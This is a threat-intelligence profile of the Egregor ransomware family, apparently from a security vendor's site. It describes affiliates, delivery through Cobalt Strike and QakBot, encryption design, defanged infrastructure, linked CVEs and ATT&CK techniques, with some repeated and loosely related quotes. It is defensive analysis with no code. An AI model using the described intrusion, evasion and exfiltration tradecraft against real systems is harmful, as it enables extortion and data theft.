Egregor
Egregor is a ransomware family active since mid-September 2020 and described as an offshoot of the Sekhmet malware family. It operated as a ransomware-as-a-service (RaaS) and has been linked by multiple security firms to former Maze affiliates; some reporting also linked it to ProLock and LockBit. Egregor conducts double-extortion attacks by stealing sensitive data, encrypting victim systems, and threatening to publish exfiltrated data on its victim blog if ransom demands are not met. Reported victims include GEFCO, Barnes & Noble, Crytek, and Ubisoft-related claims. As of 2020-11-24, its leak site reportedly listed 152 victim companies across multiple industries worldwide, with information technology, construction, retail, consumer goods, and automotive especially represented.
Initial access and delivery varied by affiliate activity, but the content states Egregor operators commonly deployed the ransomware after prior compromise through phishing or RDP exploitation, with Cobalt Strike described as the primary distribution method. QBot/QakBot has also been observed distributing Egregor, and related activity used living-off-the-land tools such as bitsadmin to download or update DLL components. One affiliate cluster, Lockean, used Egregor among several RaaS families after gaining access primarily through Qbot/QakBot and then using tools including Cobalt Strike, Adfind, BloodHound, BITSadmin, and Rclone. Microsoft also noted DEV-0216 operated as an affiliate for Egregor, Maze, LockBit, REvil, and Conti.
Technically, Egregor payloads are heavily obfuscated DLLs containing Salsa20-encrypted configuration data. Each payload requires a sample-specific launch key passed with the -p parameter; without the correct key, the malware fails to launch correctly. The malware encrypts files using ChaCha together with RSA, and each payload contains an RSA-2048 public key. Ransom notes instruct victims to visit a Tor-based payment portal and contain an encrypted blob with victim-specific system data and an encoded RSA public key. The victim-specific blob can include local drive information, drive size and free space, hostname, discovered antivirus or security products, and user or domain context.
Observed behavior includes HTTPS command-and-control communications, user discovery, disabling Windows Defender, anti-analysis and anti-sandbox techniques, process injection into iexplore.exe, use of encoded PowerShell commands via a service created by Cobalt Strike for lateral movement, and checking for the LogMeIn event log in an attempt to encrypt files on remote machines. Egregor also used Rclone for data exfiltration, dropping its own copy together with attacker-supplied configuration data. The malware reportedly avoids encrypting systems whose primary language is Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Kyrgyz, Romanian, Russian, Tajik, Tatar, Turkmen, Ukrainian, or Uzbek.
Egregor also used intimidation tactics associated with ransomware operations, including "print bombing" victim organizations by repeatedly printing ransom notes from connected printers. Known infrastructure mentioned in the content includes the victim blog egregoranrmzapcv[.]onion, archive site egregornews[.]com, and payment portal egregor4u5ipdzhv[.]onion.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Some sources also report the possible exploitation of CVE-2018-8174 (VBScript Engine), CVE-2018-4878 (Adobe Flash Player) & CVE-2018-15982 (Adobe Flash Player). | Egregor ransomware is an offshoot of the Sekhmet malware family that has been active since mid-September 2020.
There have been limited and uncorroborated reports of Egregor utilizing CVE-2020-0688 (a remote code execution flaw in Microsoft Exchange). | Egregor ransomware is an offshoot of the Sekhmet malware family that has been active since mid-September 2020.
Some sources also report the possible exploitation of CVE-2018-8174 (VBScript Engine), CVE-2018-4878 (Adobe Flash Player) & CVE-2018-15982 (Adobe Flash Player). | Egregor ransomware is an offshoot of the Sekhmet malware family that has been active since mid-September 2020.
Some sources also report the possible exploitation of CVE-2018-8174 (VBScript Engine), CVE-2018-4878 (Adobe Flash Player) & CVE-2018-15982 (Adobe Flash Player). | Egregor ransomware is an offshoot of the Sekhmet malware family that has been active since mid-September 2020.
The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability... Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher... The exploit was used in Maze and Egregor ransomware campaigns. | The exploit was used in Maze and Egregor ransomware campaigns.
Researchers noticed a recent trend in which Prophet Spider uses CVE-2020-14882 and CVE-2020-14750 to get a foothold into target environments. Both CVEs relate to path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution.
Researchers noticed a recent trend in which Prophet Spider uses CVE-2020-14882 and CVE-2020-14750 to get a foothold into target environments. Both CVEs relate to path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution.
Groups observed using it
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
DEV-0216 ... has operated as an affiliate for Egregor, Maze, Lockbit, REvil, and Conti in numerous high-impact incidents.
Between June 2020 and March 2021, Lockean attacked at least seven more companies with various ransomware families: Maze, Egregor, ProLock, REvil.
Between June 2020 and March 2021, Lockean attacked at least seven more companies with various ransomware families: Maze, Egregor, ProLock, REvil.
"...TWISTED SPIDER achieved at least 26 infections at healthcare sector victims with their Maze and Egregor ransomware families..."
At the close of 2020, we noticed a shift in a subset of these groups that have started to deploy EGREGOR ransomware in favor of MAZE ransomware following access acquired from ICEDID infections.
Prophet Spider functioned as an access broker and likely granted access to Egregor and MountLocker ransomware operators in exchange for payment.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
"After the hacker gained access to a Windows domain administrator account..."
"Prophet Spider has also been seen using older Oracle CVEs such as CVE-2016-0545, as well as gaining initial access via SQL injection." | "attackers exploit Oracle WebLogic server flaws to access target environments" ... "uses CVE-2020-14882 and CVE-2020-14750 to get a foothold" ... "path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution."
Execution
4 techniques
Execution
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
The content repeatedly mentions '.bat', '.cmd', and 'batch scripts' used to automate execution, persistence, cleanup, deployment, disabling security tools, and ransomware operations. Examples: 'APT1 has used ... batch scripting to automate execution', 'Blue Mockingbird has used batch script files to automate execution and deployment of payloads', and 'Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO.' | The content repeatedly describes use of cmd.exe, cmd /c, Windows command shell, and xp_cmdshell to execute commands, run payloads, launch binaries, perform reconnaissance, persistence, cleanup, and ransomware actions. Examples include: 'Sandworm Team used the xp_cmdshell command in MS-SQL', 'APT41 used cmd.exe /c to execute commands on remote machines', and many malware families 'can use cmd.exe to execute commands on a compromised host.'
Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS.
Persistence
2 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
Stealth
8 techniques
Stealth
"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
"After the hacker gained access to a Windows domain administrator account..."
Discovery
9 techniques
Discovery
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
MITRE ATT&CK Software Discovery: Security Software Discovery T1518.001
Examples include "Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found," "DropBook has checked for the presence of Arabic language," and "Maze has checked the language of the infected system using the GetUSerDefaultUILanguage function."
Lateral Movement
1 technique
Lateral Movement
"During the 2022 Ukraine Electric Power Attack, Sandworm Team utilized a PowerShell utility called TANKTRAP to spread and launch a wiper using Windows Group Policy," and "Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts."
Command and Control
1 technique
Command and Control
Impact
3 techniques
Impact
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key.
Other
2 techniques
Other
The content repeatedly describes threat actors and malware disabling, stopping, uninstalling, or modifying antivirus, EDR, Windows Defender, AMSI, logging, and other security controls.
Examples include 'Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools', 'BlackByte disabled security tools such as Windows Defender', 'Scattered Spider has uninstalled and disabled security tools', and many malware families terminating AV/EDR processes or services.
IOCs tracked for this family
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
65 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware payload dropped by Lockean affiliates on systems infected via Qbot/QakBot with TA551 collaboration.
Ransomware family referenced as a group FIN7 previously collaborated with (contextual association, not necessarily tied to the specific Veeam CVEs in this article).
Ransomware referenced as using intimidation and internal defacement techniques such as ransom notes and print bombing during encryption operations.
Ransomware family referenced as part of FIN7’s known collaboration set; no direct technical linkage to the Veeam CVEs is described in the provided content.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.